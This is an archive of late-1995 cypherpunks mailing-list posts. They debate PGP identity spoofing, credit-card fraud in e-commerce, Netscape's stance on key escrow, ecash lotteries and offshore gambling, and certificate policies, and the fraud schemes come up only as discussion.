In-Reply-To: <m0tKuh9-0008zjC@pacifier.com>
Message-ID: <199511301156.WAA24082@sweeney.cs.monash.edu.au>


-----BEGIN PGP SIGNED MESSAGE-----

Hello Jon Lasser <jlasser at rwd.goucher.edu>
  and jimbell at pacifier.com (jim bell)
  and cypherpunks at toad.com

jim bell wrote:
> >On Tue, 28 Nov 1995, Adam Hupp wrote:
...

One reason why Alice might not want to use PGP would be that posession
of the secret key would be ipso facto evidence that he is Alice.

...
> spoofed, HE WILL KNOW because he will see a message with his signature that
> HE KNOWS he didn't send.  At that point, he will at least be able to reduce
> the number of spoofed messages to 1 before he alerts us that there is a
> problem.  We won't necessarily know who to believe, of course, but we will
...

Who to believe: at that stage, Alice will simply cease to exist.
The key will be revoked and Alice will be no more. A new Alice may
or may not arise, but no-one will know if it's the same one.

If Alice is afraid of loss of identity (as if he had one now),
he could have a permanent key at home (where he does his OTP work),
and on his e-mail machine have only a temporary key. When the key
on the public machine is compromised, it is revoked and a new one
is issued.

(The same can be done with real-name keys, BTW; viz my own key.)

...
> 3.  Somebody found out how to break 1024-bit PGP keys easily.  (Very
> unlikely, of course.)
...

In this case I think we are all stuffed.


Adiau'

Jiri
- --
If you want an answer, please mail to <jirib at cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBML2cAyxV6mvvBgf5AQFU7wP/ap/HA2SzMfRoM+5Rihw+j9RHC7aZNCtq
ZcUbXJRVXA2iDZfTE/vd5NgYDxEflyb9FwcGd8MZ8s0pxmee/iqEx3YXI0M2b7gL
HOex526hifweAQmaPoSQLWqiN4XVZ51XVBvKOJos/9eOX9FAZDRQZd6KFBaSqIcc
ZpzQ54NLm0g=
=BLPi
-----END PGP SIGNATURE-----





From futplex at pseudonym.com  Thu Nov 30 05:02:47 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 30 Nov 1995 21:02:47 +0800
Subject: The future will be easy to use
In-Reply-To: <199511300704.XAA01742@blob.best.net>
Message-ID: <199511300819.DAA10897@opine.cs.umass.edu>


Jon Lasser writes:
> However, if you have optional linking of ID and name, shippers will only 
> ship to keys with such attributes. Because just ID and address, it could 
> be a "hit and run" type attack shipped to a safe maildrop.

People who steal credit cards prefer to order goods to be delivered somewhere
they can grab them. (Often this is just the front of the rightful owner's
home, while Holly the Homeowner is off at work.) But that's just another
reason to cut down unauthorized credit card charges, not a reason to restrict
what a rightful cardholder can do with the card. I _want_ to be able to have
stuff delivered to arbitrary locations, and I _don't_ want to give that up
just to make it tough on thieves.

James Donald writes:
> This argument makes no sense at all:  I am going to attack my
> enemies by paying people to send books, computers, and stuff
> to them?

Ordering hardcore porno videos to be sent to, say, somewhere in Tennessee
might work pretty well in our sadly repressed society.

-Futplex <futplex at pseudonym.com>





From dlv at bwalk.dm.com  Thu Nov 30 05:09:31 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 30 Nov 1995 21:09:31 +0800
Subject: The future will be easy to use
In-Reply-To: <199511300819.DAA10897@opine.cs.umass.edu>
Message-ID: <96oDFD11w165w@bwalk.dm.com>


futplex at pseudonym.com (Futplex) writes:
> People who steal credit cards prefer to order goods to be delivered somewhere
> they can grab them.

For most goods, yes. But one could use a stolen credit card, e.g., to set
up an account on AOL / CompuServe and download tons of software, charging
it to the card.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From jamesd at echeque.com  Thu Nov 30 21:19:23 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 95 21:19:23 PST
Subject: The future will be easy to use
Message-ID: <199512010519.VAA12881@blob.best.net>



>On Tue, 28 Nov 1995, James A. Donald wrote:
>> This argument makes no sense at all:  I am going to attack my
>> enemies by paying people to send books, computers, and stuff
>> to them?

At 12:39 PM 11/30/95 -0500, Jon Lasser wrote:
>No; you're going to steal from your enemies by having them ship things to 
>you without payment.

Why would I bother to use encryption to encrypt someone elses credit
card number?  This is like arguing that I could use a crypto book
to hit someone over the head with in order to steal their wallet,
or arguing that a firewalled computer can still be attacked with
a sledge hammer.  Irrelevant.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From wfgodot at iquest.com  Thu Nov 30 05:22:38 1995
From: wfgodot at iquest.com (Michael Pierson)
Date: Thu, 30 Nov 1995 21:22:38 +0800
Subject: Diskless "Eunuchs" Machines Likely to Fail
In-Reply-To: <ace0059603021004f459@[205.199.118.202]>
Message-ID: <gfNvw4B4GX4D088yn@iquest.com>


-----BEGIN PGP SIGNED MESSAGE-----


In article <ace0059603021004f459@[205.199.118.202]>, Timothy C. May wrote:


>A couple of years ago "the computer for the rest of us" was said to be a
>pen-based Newton-type machine, now it is said to be a diskless,
>memory-limited "Eunuchs" machine.



Beyond the specifics of Oracle's naive vision, I think what is
doomed (I hope) to fail is the obsolescent paradigm that it reflects.
It seems that many corporate types are fixated on the idea of tractable
and predictable consumers.  The need to raise the population and
broaden the demographic of potential customers for the coming
Information SuperMarketway by minimizing the entry cost is obvious. The
approach to understanding the actual dynamics of why people are and
will increasingly come into this space and what they will want to do
once they get there is deficient for many.  Some are intimidated by the
unpredictably evolving emergent properties of consumer (well, still
mostly window shopper) behavior in this new territory, and are looking
for the comforting familiarity that their marketing consultants and
financial planners could provide them in the old brickspace way of doing
business.  Others are puzzled, or are overtly threatened by the idea of
potential consumer's who are also content producers.

I think that the limitations of interactive set-top boxes and
lobotomized net terminals appeals to this mindset.  There's less
likelihood of troubling novel behavior and initiative.  The consumer's
options are constrained and thereby the details of marketing are more
manageable.

These prospective cyber-consumers who are increasingly in the
frustrating habit of producing and sharing content amongst themselves
(usually for free, no less!), thereby distracting each other from the
content providers and virtual storefronts they should be flocking to,
are a potent wild card in the game that many cannot deal with, and some
wish they could deal out of the deck.  This nascent internet phenomenon
is the economic aspect of the broader disintegration and decline of the
means to control mass opinion and behavior that many in the current
ruling class find threatening as well.  The corporations that can get a
clue, and learn how to go with the flow of this changing environment, can
still prosper. The dinosaurs who can't, or won't adapt, will free up
valuable niches for the independent upstarts who not only can ride the
waves of change, but who thrive on them and even strive to make them
bigger.

Oracle's vision of the low-cost, diskless "Eunuchs" net station
may materialize on the shelves of Walmart, and Circuit City, etc...
But it will not take long for those who buy them to realize that
they are in a subclass on the internet (That is, if they are really
given the freedom to explore the net at large) and to feel frustrated
with their limited options to create and express themselves.  Those
too dim-witted to notice or care might as well have remained as bovine
Cable Shopping Network viewers ensconced in their TV room lounge chairs.

I do think that there is a substantial and viable market for entry level
notebook form factor (running off a cheap wall socket DC converter with
battery optional) 'Net' PC's well below $1000 in the not-too-distant
future.  Processor and hard drive costs are certainly dropping fast
enough to make that a credible possibility.  Display and memory costs
remain the major obstacles, but I think workable compromises could be
made.

This could be a potent opportunity for somebody like the AIM alliance
to make an end run around the Intel-Microsoft axis, if they were able to
take the long view and act decisively (yeah...fantasy).  Start with
something like the low end PPC602, develop a highly integrated chip set
for video, drive, RAM controller, modem,  etc... Surface mount on board
with RJ-11, USB and external monitor connector, include as much HD as
will fit within the target production cost. Throw in a SIMM or DIMM slot
for the option of supplementing the minimum included memory later.
Provide greyscale LCD standard with color dual-scan option.  Come up
with a _TIGHT_ fully native code subset of MacOS.  Add a compact
application suite including internet connectivity plus simple PIM and WP
functionality. Provide a coupon for a subsidiary online service cum
internet gateway, ala MSN. Sell the machine at a minimal margin over
cost, and view the entire venture as a way to gain broad market
presence. Market presence must have substantial worth, because
Netscape's stock is surely not being valued on its price-earnings
ratio.


>The only relevance of this whole topic to Cypherpunks is....is....minimal.


Well, perhaps.  I suppose I'm risking the chastisement of Cypherpunk
purists with my follow-up on this non-crypto topic. But it seems to me
that the broadest shared sentiment among the people on this list is a
passionate interest in defending and expanding personal liberty,
sovereignty and privacy in cyberspace, and the realization that
the unencumbered use of strong cryptography is indispensable to those
goals. If it wasn't for this nexus, there would be no cypherpunks, and
the esoteric technicalities of modern cryptography would be of interest
to few besides professional security consultants/programmers and obscure
academic types.  It's useful to explore the wider context of relevance
occasionally, if only to gain perspective (As long as we can avoid
another Ayn Rand or Noam Chomsky pissing match...).


ObCrypto:

People limited solely to diskless terminals for their internet access will
be second class netizens.  They would be less likely to really
appreciate and comprehend the issues surrounding online privacy and
cryptography, and they would be less able to take action on these issues
even if they wanted to.


- -Michael



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML1jZtGJlWF+GPx9AQGhcAP/WL7+Unoxn51A2QlCRRSsS8wXdi7/UuFz
3JSC49VJLU7KFWEqTwhIV657JubChxUjN1mxymSDbaoROWcyPn8AlEVuLD2Y/NcW
SYYCAy1nJWh8H2yFAz1aW2XToG09V/XrO/hhcN8WyM8agJoYcVxdCmRuC/6bhPnG
qBcMn7amGnE=
=/Qbk
-----END PGP SIGNATURE-----





From jya at pipeline.com  Thu Nov 30 05:37:42 1995
From: jya at pipeline.com (John Young)
Date: Thu, 30 Nov 1995 21:37:42 +0800
Subject: RED_sky
Message-ID: <199511301327.IAA13236@pipe1.nyc.pipeline.com>


   11-30-95. W$Jiver, Page One lead:

   "New Satellite Imaging Could Soon Transform The Face of the
   Earth. Big Worries About Security."

      Next time you gaze into the heavens, practice your
      smile. The ventures being backed by companies such as
      Lockheed Martin Corp., the E-Systems Corp. and Orbital
      Sciences Corp. will offer days-old digital images of
      unprecedented clarity. These corporate systems worry
      some scientists and federal policy makers concerned
      about privacy invasion and a free-for-all expansion of
      espionage. One notes that Lockheed Martin and E-Systems
      already have such systems in space. "They do this for
      the intelligence agencies. The very system that they're
      putting up there is a classified system now."

      A Senate staffer says that as budgets are chopped for
      the NRO and military satellite operators, the commercial
      systems will offer lower-cost images for government
      needs, preserve jobs and know-how in a vital area of
      technology and ensure U.S. leadership in the imaging
      industry. Nations such as France, Russia, South Africa,
      India and Israel are contemplating expanded use of their
      high-resolution systems.

   RED_sky  (16 kb)







From jamesd at echeque.com  Thu Nov 30 21:49:11 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 95 21:49:11 PST
Subject: Netscape, Corporations, and GAK Support
Message-ID: <199512010549.VAA27849@blob.best.net>


At 03:08 PM 11/30/95 -0500, hallam at w3.org wrote:
>
> Folks, lay of Netscape on this one. [...]
> 
> It is the idea that individuals be forced to 
> use it for private conversations that is the bad idea.

Jim Clark advocated Governemnt Access to Keys:  GAK.  He
did not advocate voluntary escrow -- very few people
object to voluntary escrow.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Thu Nov 30 21:49:15 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 95 21:49:15 PST
Subject: Getting a copy of the Jim Clark speech
Message-ID: <199512010549.VAA27874@blob.best.net>


At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
> I'm working on an "obnoxify" program to convert 
> normal html documents into documents that look 
> normal to non-netscape browsers, but are too painful to
> read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  
> I think tomorrow evening would be a good time to decide 
> whether or not to distribute it.

Is there any way one could set up a dirty pictures web
page in such a fashion that it would be difficult, painful,
and impractical to get at the pictures through that page
with a netscape browser?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From holovacs at styx.ios.com  Thu Nov 30 05:52:39 1995
From: holovacs at styx.ios.com (Jay Holovacs)
Date: Thu, 30 Nov 1995 21:52:39 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <ace2ae070a021004a5e9@[205.199.118.202]>
Message-ID: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>


On Thu, 30 Nov 1995, Timothy C. May wrote:

> 
> Can Netscape continue to prosper? This latest issue won't kill it,

I suspect this will unfortunately help. Stockholders are interested in 
profits, not principles. Co-oping with the feds will help Netscape get to 
the commercial market sooner, and most customers, sadly don't give a damn 
about privacy (or don't understand).

Jay Holovacs <holovacs at ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
> 





From sameer at c2.org  Thu Nov 30 21:55:38 1995
From: sameer at c2.org (sameer)
Date: Thu, 30 Nov 95 21:55:38 PST
Subject: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <199512010549.VAA18386@infinity.c2.org>


	I knew livescript was nasty...

> 
> 
> Talking of Netscape - this posting prompted me to forward it given the 
> security and privacy implications inherent in the problem.
> 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From OpsAn at gnn.com  Thu Nov 30 22:12:51 1995
From: OpsAn at gnn.com (Michael Coates)
Date: Thu, 30 Nov 95 22:12:51 PST
Subject: AUTHOR A VIRUS, GO TO JAIL
Message-ID: <199512010612.BAA13976@mail-e1a.gnn.com>


Found this intersting too.  US Position?

AUTHOR A VIRUS, GO TO JAIL
A computer cracker last week became the first virus writer sentenced to a
jail term under Great Britain's Computer Misuse Act.  The 26-year-old
perpetrator was sentenced to 18 months in jail after pleading guilty to 11
charges connected with placing virus-infected programs on computer bulletin
boards.  (Investor's Business Daily 29 Nov 95 A6)






From an366601 at anon.penet.fi  Thu Nov 30 06:23:45 1995
From: an366601 at anon.penet.fi (** CRAM **)
Date: Thu, 30 Nov 1995 22:23:45 +0800
Subject: call forwarding trick in Las Vegas
Message-ID: <9511301409.AA17120@anon.penet.fi>




From: an453380 at anon.penet.fi


Your cybercrime task forces and exotic examples sound very intriguing, 
however, here in Las Vegas, Nevada we have a situation that is exotic but not 
quite in the same way.  An "outcall" business has seemingly placed the 
telephone numbers of the major hotels into a Database along with the phone 
numbers of the local legal "outcall" services.  When a "guest" from a hotel 
calls to have an exotic dancer entertain him in his hotel room, his call is 
"call forwarded" from the service to which he called to allegedly  "S. E." and 
"R. S.".  The "call forwarding" process was accomplished by a Select Call 
Forwarding maneauver from "off premises" and was not authorized by the service 
which was "by-passed".  It seems no one much cares, (except the services from 
which the business was stolen), so this character is stealing to the tune of 
approximately $200,000.oo per week.  How long will it be until he taps into 
the banks, etc?  Does he pay taxes on his "full income"?  How can this 
maneauver be cancelled by the owners of the businesses from which are being 
stolen?  This guy is so brazen/stupid, he brags about "his accomplishment".

Any input would be much appreciated.

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse at anon.penet.fi
For information (incl. non-anon reply) write to    help at anon.penet.fi
If you have any problems, address them to          admin at anon.penet.fi





From s1113645 at tesla.cc.uottawa.ca  Thu Nov 30 06:40:49 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 30 Nov 1995 22:40:49 +0800
Subject: Credit card theft Re: The future will be easy to use
In-Reply-To: <96oDFD11w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9511300805.B35014-0100000@tesla.cc.uottawa.ca>




On Thu, 30 Nov 1995, Dr. Dimitri Vulis wrote:

> futplex at pseudonym.com (Futplex) writes:
> > People who steal credit cards prefer to order goods to be delivered somewhere
> > they can grab them.
> 
> For most goods, yes. But one could use a stolen credit card, e.g., to set
> up an account on AOL / CompuServe and download tons of software, charging
> it to the card.
> 

<Flamebait>
Or c2.org, which might then make things interesting if the theft is detected.
(in a very perverse, and tooth-gnashingly aggravating way, of course).
Would Sameer cooperate with the LEAs to catch "an anonymous suspect using
his service"? 

What if it's an ecash password getting stolen? Who's liable? (lemme 
guess, your money's gone, tough luck!) What if you're just a dumb 
gullible computer newbie who trusts ecash for its vaunted security? 
"But how was I supposed to know that if I let someone surf my 
shoulder, I'd lose my bank account!?" I'd say buyer beware! but he'd 
sue and the public will want a law ("Damn it, consumers have to be 
PROTECTED!").
Credit only has $50 worth of risk, most people are more interested in 
keeping their $ than their privacy. Just look at the number of them who 
enter contests.
</Flamebait>

Disclaimer: I don't have a marktwain account at the moment, so I can't
say a thing about the security of the system. I wish them the absolute best of 
luck.





From rah at shipwright.com  Thu Nov 30 06:41:40 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 30 Nov 1995 22:41:40 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <v02120d45ace367e370bd@[199.0.65.105]>


At 5:27 AM 11/30/95, Timothy C. May wrote:
<snip>
>My intuition (hand-waving) is that an anonymous lottery is possible, but I
>haven't looked at the details. Certainly multiple trusted holders of keys
>(escrow agents) would help make the lottery fair. Maybe bit commitment
>would help (each player buys the right to play, then "commits" his number.
>A public reading of the winning number occurs, and the winner can reveal
>his winning number (anonymously if he wishes, providing he had registered
>his hash....).

My bet it would work a lot like anonymous voting schemes would, though I
don't know how. It just feels like the same kind of thing...

Cheers,
Bob

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From nobody at REPLAY.COM  Thu Nov 30 06:58:26 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 22:58:26 +0800
Subject: Quit it!
Message-ID: <199511300520.GAA07040@utopia.hacktic.nl>


I am me!  

No I am not!

Yes I am!

No I'm not!  

  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.
                      C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
  
  








From rsalz at osf.org  Thu Nov 30 06:59:19 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 30 Nov 1995 22:59:19 +0800
Subject: SKIP, NFS, SSL, etc.
Message-ID: <9511300443.AA18343@sulphur.osf.org>


NFS is not a valid example of a one-vendor internetworking protocol.
In the early days of NFS Sun worked amazingly hard to get all the major
Unix players to support it.  They all but lent out engineering staff;
they hosted several 'connectathons', where everyone tested interoperability,
made the license minimal cost (if not free), etc.  And, of course, there
was nothing competing.
	/r$





From thad at hammerhead.com  Thu Nov 30 07:01:10 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Thu, 30 Nov 1995 23:01:10 +0800
Subject: Internet gambling
Message-ID: <199511300541.VAA04276@hammerhead.com>



My favorite numbers game is "fixed".  Choose a number from 1 to 1000.
The least chosen number is the winner, and it pays off 1000:1.  This
least chosen number would have to be published in some non-repudiatable
way, but that's not too hard.  The fun thing is that you get to play with
the minds of all the other players...when would be the first time that
the same number was the winner two days in a row?  Or how many times
with 666 be the winning number?  Or whatever.  Bet all numbers, and it's
a wash.

thad
-- Thaddeus Beier                   email:  thad at hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244





From s1113645 at tesla.cc.uottawa.ca  Thu Nov 30 07:03:33 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 30 Nov 1995 23:03:33 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300250.SAA07657@infinity.c2.org>
Message-ID: <Pine.3.89.9511292329.A20600-0100000@tesla.cc.uottawa.ca>


Deja vu?

On Wed, 29 Nov 1995, sameer wrote:

> 	I think it would be easier if the lottery owner was just in a
> safe jurisdiction. Then he wouldn't have to worry about the legality
> of it, and not worry about his anonymity. Gambling-safe jurisdictions
> *do* exist.

Wasn't www.casino.org a participant in the ecash trial run? I remember them 
having a highly entertaining disclaimer. They're somewhere in the carribean,
I think. Supposedly (so said the cbc news last year) some gent here in 
Ontario (where non-licensed gambling is of course illegal--the gov likes its
monopoly) set up the domain and the webpage and sold space on the "Virtual
Strip" to interested offshore governements. Since the actual casino sites
aren't in Canada (and probably offshore gov run) it is legal for the 
operators. It is illegal for us North Americans to use though.
I just checked the site and saw quite a few casino operations on the strip.
I didn't notice the ecash logo this time around (I'm doing this off lynx, 
it might only be shown in the graphical version). 

> 	There lies a problem if *playing* a game is illegal in the US, 
Which is what the casino.org page says.

> which I beleive it may be. If the winners can be revealed by
> bank/lottery collusion, then in order to protect the winners the
> lottery can't collude with the bank. This may not be a problem,
> because the lottery isn't subject to US law, so there would be no way
> to force the lottery to collude with the bank to reveaol the
> identities of the winners.

And no economic incentive for the lottery.
What are the regulatory hassles of setting up a gambling operation in one 
of the US states where it's legal (ie Nevada) ?
I take it it would still be illegal for someone outside the state to 
gamble using the service.

Isn't there also some Scandinavian bank that's handling ecash? It might be
hard to explain to US tax authorities how large amounts of anon currency
are ending up in one's marktwain account. In that case it might be 
interesting for someone to setup an anon service provider along the lines
of c2.org which would allow users to run java scripts, no-questions asked
(presuming this is a legal gambling jurisdiction). Java-based casinos, 
anyone? (or just normal unix c progs, given shell access)

Of course life will be much nicer when Chaum sheds his (*ahem*) ethics
and starts licensing to offshore banks. (I take it Scandinavian taxes are 
far worse than American ones. I would think they'd be less 
drug-money-laundering paranoid than the US however. Makes you wonder how
much attention the Fincen boys are giving marktwain at the moment).







From fletch at ain.bls.com  Thu Nov 30 07:28:42 1995
From: fletch at ain.bls.com (Mike Fletcher)
Date: Thu, 30 Nov 1995 23:28:42 +0800
Subject: VisaCash security.
In-Reply-To: <Pine.SUN.3.91.951130113539.3024C-100000@ipied.tu.ac.th>
Message-ID: <9511301505.AA04420@outland>



	I think the Visa stuff is basically stored value and 
rechargeable smart cards, not really ecash type money.  Supposedly
you'll be able to get a card with $10 or $20 on it and all the
vending machines and phones around the Olympic venues will be set
up to take the cards.  So to answer your questions, no it's not really
digital cash (like ecash); and yes I think it's probably traceable
to some extent (unless you buy stored value cards w/paper cash).

	First Union, the bank selling the cards, has a page on them:

http://www.firstunion.com/visacash/

	Low on the technical info, but they give an address to mail
questions to.

---
Fletch                                                     __`'/|
fletch at ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------







From perry at piermont.com  Thu Nov 30 07:43:58 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 23:43:58 +0800
Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
In-Reply-To: <01BABEAC.2E90BDC0@ploshin.tiac.net>
Message-ID: <199511301513.KAA05983@jekyll.piermont.com>



Pete Loshin writes:
> I was simply observing that Perry's comment:
> 
> "...an internetworking protocol [e.g. SKIP] used by only 
> one vendor gets nowhere."
> 
> is not necessarily true, and pointed to SSL and NFS as 
> counter-examples.

I disagree.

First of all, NFS was not competing with other widely available
standards.

Second of all, other vendors are committed to developing the other
standard.

What good will it be to run SKIP when your Cisco router wants to talk
to you with something else?

Perry





From perry at piermont.com  Thu Nov 30 07:53:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 23:53:32 +0800
Subject: Your faith is PGP is charming and quaint, but wrong
In-Reply-To: <199511300446.UAA19851@infinity.c2.org>
Message-ID: <199511301515.KAA05995@jekyll.piermont.com>



Hroller Anonymous Remailer writes:
> 
> All of these articles from people claiming to be me!
> 
> I repeat, for the slow learners, that I consider PGP to be
> untrustworthy, at least on my machines. I don't want those Mounties
> to do to me what they did to Mulroney en passant.

How do we know that you are you? We have no evidence.

Perry





From cme at TIS.COM  Thu Nov 30 07:55:30 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 30 Nov 1995 23:55:30 +0800
Subject: The future will be easy to use
In-Reply-To: <199511292049.MAA01411@comsec.com>
Message-ID: <9511301511.AA27694@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>From: Rich Salz <rsalz at osf.org>
>Date: Wed, 29 Nov 1995 08:54:33 -0500



>Bingo!  This is one of the hard parts of certificate authorities; just
>what are you attesting to?  The American Bar Association has a big document
>for public review that addresses what this might mean; there are a couple
>of RFC's that specify CA policies (one from COST in Sweden, I think), and
>RSA and/or Verisign will give you their policy in hardcopy.
>
>In x.509v3 certificates, there is an extensible field where the key-signer
>can put arbitrary data.  The intent is apparently that you put the ISO
>object-ID (you know, those funny 1.3.2.11.... numbers) of the policy
>document.

Ah, yes.  Here's another example of the problem with ASN.1.  That field
could equivalently be just a URL for the policy document (or, if short
enough, the policy itself).  However, ASN.1 seduced folks into indirecting
this through some object ID -- bringing all these documents into the one
master hierarchy of things in the world.

Some people just like hierarchies, I guess. :)

>There is, of course, no way to interpret the semantics of this electronically.

Of course not.  In the end, a human needs to make the decision based on
ASCII text.

>It will be interesting to see how various companies address this issue,
>for example as they start to support arbitrary CA's in browsers or servers
>while doing commerce over the web.

Yup.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML3JY1QXJENzYr45AQHWIwP/VzoZuonIoMbIYHaA+noZpwnmNnxXc+jx
elJNQkHglyE7U1pBfC90s8IewujeG5T97v5g5e9bAXi/gysIPoguAXYSdIufvjz+
+WpCDrxn4UlfRzfOrTOgpZ1KQwPUllywOo1Yehd2h35ctJ8P7sa27mS/AEyET85E
rUvKlVpN/04=
=EhTO
-----END PGP SIGNATURE-----





From adam at lighthouse.homeport.org  Thu Nov 30 08:09:03 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Fri, 1 Dec 1995 00:09:03 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <199511300807.DAA12251@opine.cs.umass.edu>
Message-ID: <199511301533.KAA17468@homeport.org>


| > http://www.cnet.com/Central/News/govt.html
| 
|    To secure Net communications, the government will need to have access to
|  private data exchanges using what is known as a key escrow security system,
|  said Clark. He added that an invincible security system for the Net is 
|  possible, but such a system won't be built unless the government
| has a stake in it. "That's where key escrow comes in," said Clark. 

	(Assuming this means Netscape intends to build-in key escrow,
not lobby for it...)

	How does Netscape intend to address the liability issues if
the key database is stolen and their *voluntary* actions lead to my
private communications being exposed?

Adam

(Jeff, if you could pass this on to the powers that escrow, I'd
appriciate it.  I know you're here on behalf of you, but...)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From nobody at flame.alias.net  Thu Nov 30 08:11:43 1995
From: nobody at flame.alias.net (Anonymous)
Date: Fri, 1 Dec 1995 00:11:43 +0800
Subject: e-cash gambling
Message-ID: <199511301536.QAA25670@utopia.hacktic.nl>


Sameer, Ian, and then Tim wrote:

<many different snips throughout>

>>	Any enterprising cypherpunks in gambling-friendly
>>jurisdictions interested? I figure it would make ecash take off.. and
>>you'd get rich.
>>
>Does anyone know what jurisdictions allow lotteries/gambling?
>
>Here's an off-the-cuff idea:
>
>[Disclaimer: The following post is a gedanken experiment.  It should not
>be interpreted as condoning or encouraging anyone to break any
>laws, no matter how stupid the laws are.]
>

>Personally, I have long had great _hopes_ for using crypto for
>non-sanctioned gambling, but I'm pretty skeptical that many people will do
>it. For one thing, anyone knowledgeable enough to be comfortable with the
>crytography knows that gambling when a house cut exists is a lose. (And
>gambling with no house cut is, at best, a wash.)

And then Allen wrote:

>How about gambling on something other than random numbers? Idea Futures
>are one instance, as is sports gambling for those interested in that sort of
>thing.

[I am posting anonymously, but about a half-dozen of you will know who
I am. Please keep it confidential. I have posted (anonymously) a while
back on this subject, and I am aware of the lame, hard to use college
site which does something similar to what I will again suggest.]

I would like to see e-cash gambling on US Presidential elections/primaries
[as is currently done in London & Moscow]. There was an interesting W$J
article that pointed out how the odds in these gambling houses track the
results of elections more accurately (from thousands of miles away) than
Gallup & Roper ever have, (and without calling me at suppertime)<g>. The
W$J article appeared right after Clinton's victory over Bush. A web-page
in London giving the odds in easy-to-read form would be nice, and might
quickly lead to demand for actual gambling from "this side of the pond."
This could be accomplished through anonymous remailers & strong crypto.
It would accomplish the cypherpunk goals of setting important information
free through use of our technology, it would encourage gamblers to learn
about strong crypto, and it would use crypto for something besides child
porn or drugs, which will be good PR for us. There will, of course, be
lame arguments about this "demeaning the integrity of the process," but
I think Letterman and Leno could be trusted to handle them without our
help. ;)

<obalice(s) -- please, make it stop!>

<obNutscrape & clipper II "cold, dead neurons.">







From anonymous at freezone.remailer  Thu Nov 30 08:23:23 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 1 Dec 1995 00:23:23 +0800
Subject: No Subject
Message-ID: <199511300354.WAA10417@light.lightlink.com>


>  And I would ask whoever DID post the PGP key under my name, to please
>  issue a revocation certificate. 
>  
>  
>  Alice de 'nonymous ...
>  
>                                    ...just another one of those...
>  
>  
>  P.S.  This post is in the public domain.
>                    C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
>  
>  


Pretender. I'm the real no-pgp Alice.



